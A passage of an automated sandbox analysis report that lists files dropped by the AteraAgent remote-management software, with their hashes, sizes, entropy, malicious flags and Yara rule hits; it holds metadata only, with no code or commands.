                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                        MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                        SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                        SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                        SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                        MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                        SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                        SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                        SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                        MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                        SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                        SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                        SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                        MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                        SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                        SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                        SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                        MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                        SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                        SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                        SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71312
                                                                                                                                                                                                                                        Entropy (8bit):6.106692533939604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:mxuAEP6SHdOP71+KXUk/lsQDzZfOmLeSo0df9Xzlu:eEP6SHdOItSlXfNeSdf9Xxu
                                                                                                                                                                                                                                        MD5:0631D48880E7DDDDE2733C133BA486BB
                                                                                                                                                                                                                                        SHA1:08BDC5C585123FA5F3B4D670DC92CBAA7620725A
                                                                                                                                                                                                                                        SHA-256:AAD8B9A018FC4C4601EDC7C9169370EEE26628C4D90F967C947BA9A81EC4B224
                                                                                                                                                                                                                                        SHA-512:3AD9C20EF888DBD78AD99673E2242ED45006F204FE704076C7791A681849E4A5DDFA9E38862F26DB8203262536E92F1757FDB6982A9FDE1625C3825D89F08A41
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):801048
                                                                                                                                                                                                                                        Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                        MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                        SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                        SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                        SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159904
                                                                                                                                                                                                                                        Entropy (8bit):6.097873216527841
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eXCCOOz54xuTlmyRmIazZ11Ip5ZUWISFogVJoQyaH5MbDiz:Wz5dQ/cpJISF5c8abC
                                                                                                                                                                                                                                        MD5:950CD24EA3A9EFE5CCE594A8B228AFDA
                                                                                                                                                                                                                                        SHA1:4609AC99EBD157E4C9BF7E276EEA961C4BB3AA4F
                                                                                                                                                                                                                                        SHA-256:2AF781190AB7C97D6B846D5027745D609AD227665695E8ECB3AFD4CC9FCE6537
                                                                                                                                                                                                                                        SHA-512:2E8D0DE29E62732458472B8FA5AC35C48416E6AA5034BE309F688A095E6222A215EA3318FA02358707FBB98918983F2AB8996AC6703585485533ED4975AB7E3F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86816
                                                                                                                                                                                                                                        Entropy (8bit):6.013720216920584
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rqz3g47M9YIB/nRPP6eyO0MIq6y7suFvTbqtN0p7pqHUzH:rq3M5ftPzTLIq6y7sgytNK7p0Uz
                                                                                                                                                                                                                                        MD5:AAB8F9887FA45F30FE04472352E5AFEA
                                                                                                                                                                                                                                        SHA1:8244D05575D13E605B22538D7AE66D4805BC45C0
                                                                                                                                                                                                                                        SHA-256:7DFACED56145F3C6B80DE25A09E0DF6729149EF3C6A8F8F1B559E93B914FD2DE
                                                                                                                                                                                                                                        SHA-512:97BA85978B48324908427833374CB3C19DE01F136D29A3ADCAC350A0555B30087513CD33BB7B18F0CB52CB3E8884E0ACD1BD256704A8B96EA0C4CA8A0F8135CE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                        MD5:90289DA899746E328816734D723C93A0
                                                                                                                                                                                                                                        SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                        SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                        SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                        MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                        SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                        SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                        SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1152141
                                                                                                                                                                                                                                        Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                        MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                        SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                        SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                        SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                        MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                        SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                        SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                        SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1782
                                                                                                                                                                                                                                        Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                        MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                        SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                        SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                        SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                        MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                        SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                        SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                        SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=6.0
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95792
                                                                                                                                                                                                                                        Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                        MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                        SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                        SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                        SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                        MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                        SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                        SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                        SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                        MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                        SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                        SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                        SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                        MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                        SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                        SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                        SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                        MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                        SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                        SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                        SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                        MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                        SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                        SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                        SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
